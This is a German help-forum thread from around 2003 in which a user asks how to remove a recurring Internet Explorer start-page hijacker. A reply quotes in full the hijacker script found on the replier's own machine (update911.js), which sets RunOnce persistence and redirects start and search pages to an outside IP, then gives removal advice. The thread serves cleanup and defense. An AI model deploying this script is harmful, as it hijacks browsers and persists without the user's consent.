Viren, Spyware, Datenschutz 11.214 Themen, 94.192 Beiträge

Lästige startseite

Space Lord / 10 Antworten / Flachansicht Nickles

Hab da mal son Problem.... ;D
Mit dem IE...
Keine angst bin grad am umsteigen ;) (versuch mich grad mit Opera.. oder gibts da bessere fürn normal user?)
Trotzdem möchte ich mal gern wissen was hir vor sich geht
Seit Wochen wird meine Startseite im IE umgeändert und zwar in der reg. So: http://%69%6e%2e%77%65%62%63%6f%75%6e%74%65%72%2e%63%63/%2d%2d/?%79%64%74%66%73
(Unter:HKEY_CURRENT_USER/Software/Microsoft/InternetExplorer/main u. /serch)
LOL ne? Lande dann immer als Startpage bei ner Suchmaschine: http://Fastserch.cc
Das ulkige ist das ich mit ad-aware UND spybot alles wech fege UND die einträge in der reg. manuell umändere.
Windows Neustart geht gut aber wehe er war ganz aus ..... dann is der ganze Scheiß wieder da...!
Ich hab überhaupt keine Idee wo da noch was sein könnte =( Platte hab ich mit antivir gescannt... nix!

Spybot findet dann folgendes immer wieder aufs neue :

HotKeysHook: Keylogger library (Datei, nothing done)
C:\\WINDOWS\\SYSTEM\\H@tKeysH@@k.DLL

Possible hijacker: Global settings (Registrierungsdatenbank-Änderung, nothing done)
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Styles\\User Stylesheet=

Possible hijacker: Global settings (Registrierungsdatenbank-Änderung, nothing done)
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Styles\\Use My Stylesheet=W=0

Possible hijacker: User settings (Registrierungsdatenbank-Änderung, nothing done)
HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\Internet Explorer\\Styles\\User Stylesheet=


--- Spybot-S&D version: 1.2 ---
2003-11-24 Includes\\Spybots.sbi
2003-11-21 Includes\\Temporary.sbi
2003-11-05 Includes\\Cookies.sbi
2003-11-05 Includes\\Dialer.sbi
2003-11-24 Includes\\Hijackers.sbi
2003-11-11 Includes\\Keyloggers.sbi
2003-11-20 Includes\\Malware.sbi
2003-03-16 Includes\\plugin-ignore.ini
2003-11-05 Includes\\Security.sbi
2003-11-12 Includes\\QA Tests.sbi
2003-11-05 Includes\\Tracks.uti
2003-11-21 Includes\\Trojans.sbi


(Hier noch nicht behoben aber spybot sagt zumindest das es behoben wurde wenn er veddisch is )
Auch wenn mir IE jetzt ma am Arsch vorbei geht will ich den kack von der Platte ham.

Thnx schon mal

bei Antwort benachrichtigen
rojasa Space Lord „Lästige startseite“
Optionen

Hi,

es handelt sich sicher um einen Skript, der immer wieder ausgeführt wird sobald Du dich abmeldest bzw. den Computer neu startest. Suche einfach mal auf C: nach *.js und öffne mit Wordpad, die Dateien die unter c:\windows + Unterordner oder c:\programme + Unterordner zu finden sind. Ausnahmen:

c:\windows\system32\oobe
c:\windows\help\tours
c:\programme\real\realone player

Also die Skripst in diesen Ordnern brauchst Du eigentlich nicht öffnen. Bei mir war die Datei update911.js, die unter c:windows zu finden war. Sie sah so aus:

var url = "http://81.211.105.8/index.php?v=1";
var burl = "http://81.211.105.8/search.php?v=1";
var fso = new ActiveXObject("Scripting.FileSystemObject");
var tfolder = fso.GetSpecialFolder(0);
var filepath = tfolder + "\\update911.js";
var Shell = new ActiveXObject("WScript.Shell");
Shell.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\tlc",filepath);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",burl);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst","no");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Custom Search URL",1,"REG_DWORD");

Sobald Du die Datei gefunden hast (muss nicht update911.js sein), einfach mal im Regedit den Eintrag löschen (und natürlich auch die Datei auf Deiner Festplatte).

ein nützliches Programm findest Du unter http://mjc1.com/mirror/hjt/. Das Programm zeigt alles, was mit Windows über die Registrierung (Regedit)gestartet wird. Einfach Programm starten --> Scann --> die entsprechenden Einträge markieren und --> Fix Cheched und sie zu löschen. Geht wesentlich schneller als mit Regedit zu suchen :)

Ich wünsche Dir viel Glück und Erfolg bei der Suche!

Viele Grüße
rojasa

bei Antwort benachrichtigen